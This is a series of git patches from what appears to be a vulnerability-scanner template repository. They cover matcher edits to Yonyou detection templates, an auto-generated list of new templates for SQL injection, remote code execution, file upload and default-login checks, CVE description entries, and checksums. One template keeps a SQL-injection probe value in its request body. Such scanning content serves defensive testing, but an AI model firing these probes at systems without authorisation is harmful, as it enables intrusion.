@@ -24,11 +24,19 @@ http:
 
         {"accNum": "6'", "functionTag": "SYS0104", "url": ""}
 
+    matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "order by begintime"
+          - 'order by begintime'
+          - '"value":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
 
       - type: status
         status:
diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
index 6b27092331..1d9799f595 100755
--- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
+++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
@@ -10,8 +10,8 @@ info:
     - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json
   metadata:
     max-request: 1
-    fofa-query: app="Yonyou-UFIDA-NC"
     verified: true
+    fofa-query: app="Yonyou-UFIDA-NC"
   tags: yonyou,nc,fileupload,baseapp,deserialization
 
 http:
@@ -22,5 +22,5 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code_1 == 200 && contains(body_1,"java.io") && contains(body_1,"EOFExceptionYI")'
+          - 'status_code_1 == 200 && contains_all(body_1,"java.io","EOFExceptionYI")'
         condition: and
\ No newline at end of file

From 0166d28ab05ca7de50d13ca8088f2fc9a9b9a2a5 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 12:43:39 +0000
Subject: [PATCH 0426/1090] Auto Generated New Template Addition List [Mon Sep
 18 12:43:39 UTC 2023] :robot:

---
 .new-additions | 101 +++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 101 insertions(+)

diff --git a/.new-additions b/.new-additions
index 6f40471da4..5301f010ce 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,7 @@
+http/cnvd/2021/CNVD-2021-33202.yaml
+http/cnvd/2022/CNVD-2022-43245.yaml
+http/cnvd/2023/CNVD-C-2023-76801.yaml
+http/cves/2022/CVE-2022-0342.yaml
 http/cves/2023/CVE-2023-22463.yaml
 http/cves/2023/CVE-2023-25573.yaml
 http/cves/2023/CVE-2023-2813.yaml
@@ -7,6 +11,16 @@ http/cves/2023/CVE-2023-39676.yaml
 http/cves/2023/CVE-2023-39677.yaml
 http/cves/2023/CVE-2023-41892.yaml
 http/cves/2023/CVE-2023-4714.yaml
+http/default-logins/d-link/dlink-centralized-default-login.yaml
+http/default-logins/o2oa/o2oa-default-login.yaml
+http/default-logins/others/aruba-instant-default-login.yaml
+http/default-logins/others/ciphertrust-default-login.yaml
+http/default-logins/others/cnzxsoft-default-login.yaml
+http/default-logins/others/supershell-default-login.yaml
+http/default-logins/seeyon/seeyon-a8-default-login.yaml
+http/default-logins/seeyon/seeyon-monitor-default-login.yaml
+http/default-logins/smartbi/smartbi-default-login.yaml
+http/default-logins/wayos/ac-weak-login.yaml
 http/exposed-panels/dbgate-panel.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
 http/exposed-panels/quilium-panel.yaml
@@ -17,4 +31,91 @@ http/osint/hackenproof.yaml
 http/osint/intigriti.yaml
 http/osint/yeswehack.yaml
 http/vulnerabilities/dbgate-unauth-rce.yaml
+http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
+http/vulnerabilities/landray/landray-oa-treexml-rce.yaml
+http/vulnerabilities/other/aic-intelligent-password-exposure.yaml
+http/vulnerabilities/other/cloud-oa-system-sqli.yaml
+http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml
+http/vulnerabilities/other/comai-ras-cookie-bypass.yaml
+http/vulnerabilities/other/huiwen-bibliographic-info-leak.yaml
 http/vulnerabilities/other/phpldapadmin-xss.yaml
+http/vulnerabilities/other/sanhui-smg-file-read.yaml
+http/vulnerabilities/other/seeyon-oa-log4j.yaml
+http/vulnerabilities/other/zhixiang-oa-msglog-sqli.yaml
+http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml
+http/vulnerabilities/realor/realor-gwt-system-sqli.yaml
+http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml
+http/vulnerabilities/sangfor/sangfor-login-rce.yaml
+http/vulnerabilities/secworld/secgate-3600-file-upload.yaml
+http/vulnerabilities/seeyon/seeyon-config-exposure.yaml
+http/vulnerabilities/seeyon/seeyon-createmysql-exposure.yaml
+http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml
+http/vulnerabilities/seeyon/seeyon-oa-fastjson-rce.yaml
+http/vulnerabilities/seeyon/seeyon-oa-setextno-sqli.yaml
+http/vulnerabilities/seeyon/seeyon-oa-sp2-file-upload.yaml
+http/vulnerabilities/shiziyu-cms/shiziyu-cms-apicontroller-sqli.yaml
+http/vulnerabilities/smartbi/smartbi-deserialization.yaml
+http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml
+http/vulnerabilities/tongda/tongda-action-uploadfile.yaml
+http/vulnerabilities/tongda/tongda-api-file-upload.yaml
+http/vulnerabilities/tongda/tongda-arbitrary-login.yaml
+http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml
+http/vulnerabilities/tongda/tongda-getdata-rce.yaml
+http/vulnerabilities/tongda/tongda-getway-rfi.yaml
+http/vulnerabilities/tongda/tongda-insert-sqli.yaml
+http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml
+http/vulnerabilities/tongda/tongda-meeting-unauth.yaml
+http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml
+http/vulnerabilities/tongda/tongda-report-func-sqli.yaml
+http/vulnerabilities/tongda/tongda-video-file-read.yaml
+http/vulnerabilities/topsec/topsec-topacm-rce.yaml
+http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml
+http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml
+http/vulnerabilities/wanhu/wanhu-download-ftp-file-read.yaml
+http/vulnerabilities/wanhu/wanhu-download-old-file-read.yaml
+http/vulnerabilities/wanhu/wanhu-oa-fileupload-controller-arbitrary-file-upload.yaml
+http/vulnerabilities/wanhu/wanhu-teleconferenceservice-xxe.yaml
+http/vulnerabilities/wanhu/wanhuoa-officeserverservlet-file-upload.yaml
+http/vulnerabilities/wanhu/wanhuoa-smartupload-file-upload.yaml
+http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml
+http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml
+http/vulnerabilities/weaver/ecology/ecology-oa-byxml-xxe.yaml
+http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml
+http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml
+http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml
+http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml
+http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml
+http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml
+http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml
+http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml
+http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml
+http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml
+http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml
+http/vulnerabilities/weaver/weaver-login-sessionkey.yaml
+http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml
+http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml
+http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml
+http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml
+http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml
+http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml
+http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml
+http/vulnerabilities/weaver/weaver-userselect-unauth.yaml
+http/vulnerabilities/wechat/wechat-info-leak.yaml
+http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml
+http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml
+http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml
+http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml
+http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml
+http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml
+http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml
+http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml
+http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml
+http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml
+http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml
+http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml
+http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml
+http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml
+http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml
+http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml
+http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml
+http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml

From 7ae56471364f9a1852eaee4a6fe0d860dda2ee3a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 12:43:44 +0000
Subject: [PATCH 0427/1090] Auto Generated cves.json [Mon Sep 18 12:43:44 UTC
 2023] :robot:

---
 cves.json              | 3 +++
 cves.json-checksum.txt | 2 +-
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/cves.json b/cves.json
index 482ba4ba06..84a00f96da 100644
--- a/cves.json
+++ b/cves.json
@@ -1439,6 +1439,7 @@
 {"ID":"CVE-2022-0271","Info":{"Name":"LearnPress \u003c4.1.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0271.yaml"}
 {"ID":"CVE-2022-0281","Info":{"Name":"Microweber Information Disclosure","Severity":"high","Description":"Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0281.yaml"}
 {"ID":"CVE-2022-0288","Info":{"Name":"WordPress Ad Inserter \u003c2.7.10 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0288.yaml"}
+{"ID":"CVE-2022-0342","Info":{"Name":"Zyxel - Authentication Bypass","Severity":"critical","Description":"An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0342.yaml"}
 {"ID":"CVE-2022-0346","Info":{"Name":"WordPress XML Sitemap Generator for Google \u003c2.0.4 - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0346.yaml"}
 {"ID":"CVE-2022-0349","Info":{"Name":"WordPress NotificationX \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0349.yaml"}
 {"ID":"CVE-2022-0378","Info":{"Name":"Microweber Cross-Site Scripting","Severity":"medium","Description":"Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0378.yaml"}
@@ -2004,6 +2005,7 @@
 {"ID":"CVE-2023-37270","Info":{"Name":"Piwigo 13.7.0 - SQL Injection","Severity":"high","Description":"Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is vulnerable at the endpoint that records user information when logging in to the administrator screen. It is possible to execute arbitrary SQL statements. Someone who wants to exploit the vulnerability must be log in to the administrator screen, even with low privileges. Any SQL statement can be executed. Doing so may leak information from the database. Version 13.8.0 contains a fix for this issue. As another mitigation, those who want to execute a SQL statement verbatim with user-enterable parameters should be sure to escape the parameter contents appropriately.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37270.yaml"}
 {"ID":"CVE-2023-37462","Info":{"Name":"XWiki Platform - Remote Code Execution","Severity":"high","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-37462.yaml"}
 {"ID":"CVE-2023-37580","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"medium","Description":"Zimbra Collaboration (ZCS) 8 before 8.8.15 Patch 41 allows XSS in the Zimbra Classic Web Client.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37580.yaml"}
+{"ID":"CVE-2023-37629","Info":{"Name":"Online Piggery Management System v1.0 - Unauthenticated File Upload","Severity":"critical","Description":"Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37629.yaml"}
 {"ID":"CVE-2023-3765","Info":{"Name":"MLflow Absolute Path Traversal","Severity":"critical","Description":"Absolute Path Traversal in GitHub repository mlflow/mlflow prior to 2.5.0.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-3765.yaml"}
 {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
 {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
@@ -2022,5 +2024,6 @@
 {"ID":"CVE-2023-39677","Info":{"Name":"PrestaShop MyPrestaModules - PhpInfo Disclosure","Severity":"low","Description":"PrestaShop modules by MyPrestaModules expose PHPInfo\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39677.yaml"}
 {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
 {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
+{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
 {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
 {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index 9f87d95beb..2b3dba12f1 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-818f0774f43e5b7487ecb8c71c473510
+af5c28a24d60b69449367f1b4cbe204e

From 9d36f7843782e9b7cd1a4e3ff6c7a1f3f5fe1a0f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 12:44:05 +0000
Subject: [PATCH 0428/1090] Auto Generated Templates Checksum [Mon Sep 18
 12:44:05 UTC 2023] :robot:

---
 templates-checksum.txt | 103 ++++++++++++++++++++++++++++++++++++++++-
 1 file changed, 102 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 984846b9a9..4d9379c68c 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -597,14 +597,17 @@ http/cnvd/2021/CNVD-2021-26422.yaml:7aaf1149908731caaa93d8e0fb1e0eca9530051c
 http/cnvd/2021/CNVD-2021-28277.yaml:524a90b6c3bf5c2bb0b4dd821d384f1f98c80765
 http/cnvd/2021/CNVD-2021-30167.yaml:4eb3fbb771c370b1e9d8f31b76c3b79a892779dc
 http/cnvd/2021/CNVD-2021-32799.yaml:dc6666e59b2a35994e6ab5a22173f52c27a6d2cc
+http/cnvd/2021/CNVD-2021-33202.yaml:7a70386f3464bace94da53839ae01f6540bd2a0e
 http/cnvd/2021/CNVD-2021-41972.yaml:f254fd8ba373fa95a4744b259048d692ef081572
 http/cnvd/2021/CNVD-2021-43984.yaml:a02d85fe2f67fe05c67462dbea8fcb7dedcbc2cc
 http/cnvd/2021/CNVD-2021-49104.yaml:e676d4620da1cd57bc021c49d3d7c7821eada127
 http/cnvd/2022/CNVD-2022-03672.yaml:e10e6a3a8c0c9527e640fcca1655186f039ce3e9
 http/cnvd/2022/CNVD-2022-42853.yaml:b09d41d36a02b364b40898c724386b30d575af2f
+http/cnvd/2022/CNVD-2022-43245.yaml:1cf34d3bee03bd6dc6aab3729d790f56c8bc6264
 http/cnvd/2022/CNVD-2022-86535.yaml:9dd03071fc9795f7ae4d99c59b3fd5342f5a5c70
 http/cnvd/2023/CNVD-2023-08743.yaml:1af1612ebc8033360c527b5a94c5e5276aac06ad
 http/cnvd/2023/CNVD-2023-12632.yaml:ceb1220ec85f8ba6607052d3ab2c9be79bd1a429
+http/cnvd/2023/CNVD-C-2023-76801.yaml:dc4eaf2a5db728835805aae29c1d1d2f9f250b48
 http/credential-stuffing/README.md:88a738a7af33e930f046a6681114389b2f341fa2
 http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml:e265b0ef4cad374b888878d8ebe4cd4bfb3a4c2e
 http/credential-stuffing/cloud/atlassian-login-check.yaml:fdc2a219979a9c538febf42cd8170a6cd8f2eabe
@@ -2061,6 +2064,7 @@ http/cves/2022/CVE-2022-0234.yaml:2d7260c3732633356837bc0f079db94065dd3269
 http/cves/2022/CVE-2022-0271.yaml:391665cb6b9f508cd44bff1bbbc2837976da4191
 http/cves/2022/CVE-2022-0281.yaml:0db781606d4f136874570f1c773bd9427ae68376
 http/cves/2022/CVE-2022-0288.yaml:819f8dbbdb80759d72a8075856fc0e46084ac72d
+http/cves/2022/CVE-2022-0342.yaml:1b8ce29c4367f437f277fb624f34d60decaaaf6f
 http/cves/2022/CVE-2022-0346.yaml:2f04269879b5048396af9ee99f32dcc636d21a76
 http/cves/2022/CVE-2022-0349.yaml:2691cb6a3ae74ebf3eb5e5f6fb0c497809b0e2f9
 http/cves/2022/CVE-2022-0378.yaml:401072c7cb325c756d294908be134a6dbb28b106
@@ -2677,6 +2681,7 @@ http/default-logins/caimore/caimore-default-login.yaml:99fb1ec6842bcbc077fe4ecbc
 http/default-logins/chinaunicom/chinaunicom-default-login.yaml:766879d4ad001d95405eedbd6cf41a721d1ed965
 http/default-logins/cobbler/cobbler-default-login.yaml:fa301242a42149b251f4e3333a74bb80d1da8919
 http/default-logins/cobbler/hue-default-credential.yaml:fb8188153e9f64e9b549221b1c25033762c5c01f
+http/default-logins/d-link/dlink-centralized-default-login.yaml:2fb59978aa8b6966213d190f5e187406d24cad69
 http/default-logins/datahub/datahub-metadata-default-login.yaml:bd7a05ffcf8c891638b330af50f5c0b4e1e4d623
 http/default-logins/dataiku/dataiku-default-login.yaml:fddf8f60eb930a654784aa8b83ad9ca83bdc0860
 http/default-logins/dell/dell-idrac-default-login.yaml:fc7952ce9f13450f9052bb245882102eb042478d
@@ -2732,6 +2737,7 @@ http/default-logins/netsus/netsus-default-login.yaml:1a16c4b65b91243e1812b98bb51
 http/default-logins/nexus/nexus-default-login.yaml:8fe15779e5063147a58aec49428856c920e62f92
 http/default-logins/nps/nps-default-login.yaml:6c66733283b7d5d33c6eed0f542315a84b5c3a9c
 http/default-logins/nsicg/nsicg-default-login.yaml:81c2c63b376dc8a788f113f1356d9451f18bfa0b
+http/default-logins/o2oa/o2oa-default-login.yaml:ce5d78c2af4057164831b75b6d8504c45d2cad5f
 http/default-logins/octobercms/octobercms-default-login.yaml:f0d672db900795b4ceb5d41204f6643a3638c4ae
 http/default-logins/ofbiz/ofbiz-default-login.yaml:57d1ba5760d36d13320c47f942461688fc9a767c
 http/default-logins/openemr/openemr-default-login.yaml:811c7955fa97e8646a469db2274049993fb279cc
@@ -2739,11 +2745,15 @@ http/default-logins/openmediavault/openmediavault-default-login.yaml:9834099923d
 http/default-logins/openwrt/openwrt-default-login.yaml:69c7ae941dcaa7356122ae3f768c9ecdc1af6b00
 http/default-logins/oracle/businessintelligence-default-login.yaml:87821130661da3e529583a12663d813d8c5167f0
 http/default-logins/oracle/peoplesoft-default-login.yaml:db410c6630144a1138600cf9fdbd9ee9251cb933
+http/default-logins/others/aruba-instant-default-login.yaml:27085659cd63d10daac6e6f5c3b303637dcd358c
+http/default-logins/others/ciphertrust-default-login.yaml:2d1200a14f70157aa95d96e3168f1b70f4313cfb
+http/default-logins/others/cnzxsoft-default-login.yaml:1c4855006f98871ba0ba8c7aa23f535e3ec5b8b2
 http/default-logins/others/inspur-clusterengine-default-login.yaml:32add6bc1485e017f0abcf8f91d6e476f81ba5dc
 http/default-logins/others/kingsoft-v8-default-login.yaml:591798244b2edc9c076ebf8ecf7ad08bda2654a8
 http/default-logins/others/opencats-default-login.yaml:6650b1aae8c37f1a6366800f8034c0f0821e4a6c
 http/default-logins/others/panabit-ixcache-default-login.yaml:8766e0552e7b64e0075de28f27925bcf63d3a91e
 http/default-logins/others/secnet-ac-default-login.yaml:e79d03d0054a338b854ae6cdcc1a234c88796712
+http/default-logins/others/supershell-default-login.yaml:8de58683e425bb93238a757de1734f36c25af34b
 http/default-logins/others/telecom-gateway-default-login.yaml:45ecbcc4fd973f1cf287f258beefdf11773d01fb
 http/default-logins/paloalto/panos-default-login.yaml:ee4b25d452d06e6091784056aea41cb18135327e
 http/default-logins/panabit/panabit-default-login.yaml:47f27a4bea32a9dc16c3f8b27bf4e81524091451
@@ -2763,8 +2773,11 @@ http/default-logins/ruckus/ruckus-wireless-default-login.yaml:99ad97e6aeaa477e7c
 http/default-logins/samsung/samsung-printer-default-login.yaml:7155ce93184e18f9a4b0abbaaaf19df91c544af1
 http/default-logins/samsung/samsung-wlan-default-login.yaml:c4231fe15979de191346b4459af2b2eb937ec76f
 http/default-logins/seeddms/seeddms-default-login.yaml:fae2feb6f0789e6c22d2d6169be8f2ff928c9de3
+http/default-logins/seeyon/seeyon-a8-default-login.yaml:3b0a402d36dc58842c1711457b24e436f0326035
+http/default-logins/seeyon/seeyon-monitor-default-login.yaml:f0d81df89f683efcf4511d165c3d117841be7dfb
 http/default-logins/sequoiadb/sequoiadb-default-login.yaml:e7b11fa64e9a06940019b8857dbf98efd342e0a8
 http/default-logins/showdoc/showdoc-default-login.yaml:3aaaaffb958f089d1d25fa67de408faad0dcf533
+http/default-logins/smartbi/smartbi-default-login.yaml:3740b1438db587745849d17c2e4f2ead59a43e9d
 http/default-logins/solarwinds/solarwinds-default-login.yaml:55c8cbfbcc7c1c74207dde1fd080deaaa1900510
 http/default-logins/sonarqube/sonarqube-default-login.yaml:b8d2672004b87c808104b16c45f538e869ea87ac
 http/default-logins/spectracom/spectracom-default-login.yaml:ea22a3032497ef474f537a030442c8504debc6cd
@@ -2781,6 +2794,7 @@ http/default-logins/versa/versa-flexvnf-default-login.yaml:96ab7f6c7005c9451f9a3
 http/default-logins/vidyo/vidyo-default-login.yaml:c291ce77d983d2b88f22028d5333b4f367ca890b
 http/default-logins/viewpoint/trilithic-viewpoint-login.yaml:e8a7e041602bb762dfb15f00157624624031826a
 http/default-logins/visionhub/visionhub-default-login.yaml:3b9293b8d6d7ba5d66e6b1ff98d6e7cb66752481
+http/default-logins/wayos/ac-weak-login.yaml:18d784dcc02d854ef735575c4ec12559450b6816
 http/default-logins/weblogic/weblogic-weak-login.yaml:aa283e0d74b0d6b2f07f2bfe734faaea644d1e8a
 http/default-logins/webmin-default-login.yaml:995be32d82bbfbc46d50efe03d926de31b39e621
 http/default-logins/wifisky/wifisky-default-login.yaml:5d8634b18606aa19a7cfdf9e15f5d63a5b12022b
@@ -6400,6 +6414,8 @@ http/vulnerabilities/joomla/rusty-joomla.yaml:243d584db6ce05f2d2e43b09daa10eae5f
 http/vulnerabilities/jorani/jorani-benjamin-xss.yaml:20d9e87a16e54390801e1ce74e3de74f7b628bbf
 http/vulnerabilities/jupyter-notebook-rce.yaml:92676b19b8b57d1039df60dd120022030d31aa9a
 http/vulnerabilities/kkfileview-ssrf.yaml:c92bd9cba0f534f2ce8e06e6a2e12b8661a9ddab
+http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml:ee7f0a933529bed15f5b339c5625e09eb8ff21c5
+http/vulnerabilities/landray/landray-oa-treexml-rce.yaml:999e35f4cacbb742829cf4c391aba9f520b6dfc2
 http/vulnerabilities/laravel/laravel-ignition-xss.yaml:3614ef96120a5f5e31ef5d9ab8034ad6fec63610
 http/vulnerabilities/linkerd/linkerd-ssrf.yaml:dfe6bc7b2dbed477b9e577df220cd814551e11c3
 http/vulnerabilities/magento/magento-2-exposed-api.yaml:a6ca4bb40cabe0e7a896f24484575ca0ec8a0ab8
@@ -6431,6 +6447,7 @@ http/vulnerabilities/other/accent-microcomputers-lfi.yaml:fb8fd5c58a72fd879efa96
 http/vulnerabilities/other/acme-xss.yaml:b292b0c0d7777a5315f06993a42056b1cb03b27f
 http/vulnerabilities/other/acti-video-lfi.yaml:a06189fd9ae35d197d6f66faae91eea5013333db
 http/vulnerabilities/other/aerocms-sqli.yaml:65ddeaac3c3c25208e60dce7e39afeb45ddbc7cc
+http/vulnerabilities/other/aic-intelligent-password-exposure.yaml:49e23fe7dead635cd5acade0e5de77dbba68f20c
 http/vulnerabilities/other/alibaba-anyproxy-lfi.yaml:c97780044dd4078b77a6834381e07c43914a380d
 http/vulnerabilities/other/alumni-management-sqli.yaml:650cbd6f515fdcc2e66a3ea8b346f9c6367ed20b
 http/vulnerabilities/other/antsword-backdoor.yaml:93db1ae5508bca36eb0b8805353de90ac653dec2
@@ -6456,7 +6473,10 @@ http/vulnerabilities/other/chamilo-lms-sqli.yaml:5fe0cff3f3f3c852fd14093b5659bc2
 http/vulnerabilities/other/chamilo-lms-xss.yaml:4c83bd6add9efe5e05240bce3fd0f858d6ed19c3
 http/vulnerabilities/other/ckan-dom-based-xss.yaml:b8b79109f77c1f61d4191f38c32814438d262623
 http/vulnerabilities/other/clodop-printer-lfi.yaml:fb9dd9be90813a7347752c35f6447881610b736a
